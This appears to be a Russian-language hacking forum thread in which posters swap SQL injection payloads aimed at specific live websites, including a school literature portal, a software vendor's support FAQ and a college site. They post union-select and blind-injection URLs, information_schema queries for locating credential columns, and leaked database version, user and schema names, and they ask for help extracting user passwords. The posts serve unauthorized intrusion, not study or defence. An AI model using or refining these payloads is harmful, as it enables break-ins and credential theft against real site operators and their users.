jokester там нет второй переменной, исходя из твоего поста и моих соображений, то навряд-ли что-то можно сделать в данной ситуации на счет функции ReRe её я сделал что бы показать какие символы на что меняются, т.е. логически исходя из моего поста, в твой запрос pass='&name=)+or+1=1/* неверен, ни по символам, ни по ситуации, так как переменная одна. Для просящих все таки выложу ссылочку, может быть кто-то умнее меня miniubka.cc/pay1.php?partner=2&video=index.php
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить): /add имхо в запрос попадает &apos (в html &apos а при просмотре ') /add2 Shadow6120, линк в студию/пм
Есть сайт на асп(судя по всему MSSQL ), ощибки базы данных не выводятся... но есть слепая инъекция, как я думаю. script.asp?id=853 - контент показывается script.asp?id=853' - контент не показывается script.asp?id=853+order+by+8-- - подобрал колонки, их восемь. script.asp?id=853+union+select+null,null,null,null,null,null,null,null-- ничего не выводиться, в том числе контент. Как быть с этим? Подбирать тип колонок вручную? или что то еще можно? И вообще, правильно ли я рассуждал?
Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил ' это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса
http://www.whimit.com/forum_read.php?f=17 Invalid query: db_query - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and g.id=gb.id order by g.id' at line 1 А больше хрен че добьешся... Все фильтрует че только можно даже group by или внатуре фиг поймешь..
__www.dpstyle.com.ua не могу найти файл, чтобы править данные вмида на свои. Уже всё перерыл. Где они вообще могут быть?
вообще сайт бажный какой-то 1. Там с нормальными параметрами не работает: Code: http://www.whimit.com/forum_read.php?f=17&id=75739 2. Code: http://www.whimit.com/album_list.php?username=inmate051877lol
2 wildshaman http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((select+user()),18,1))=x я нашел слепухy Version : 5.1.30-log Database : dblit User : webuser@localhost
http://www.dnastar.com/support/FAQs1.php?faqid=-1 Не могу вытащить юзеров и пароли ихнее а точнее вытащил из таблицы user колонку username токо =\ дальше чет не могу так как все там перерыл
diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number) http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F,table_name),4,5,6+from+information_schema.columns+where+column_name+like+'%num%'/* ssnum/forms может что-то из этого .. проверь на всякий случай. 2sabe http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version(),1,1)=4 версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона
http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.
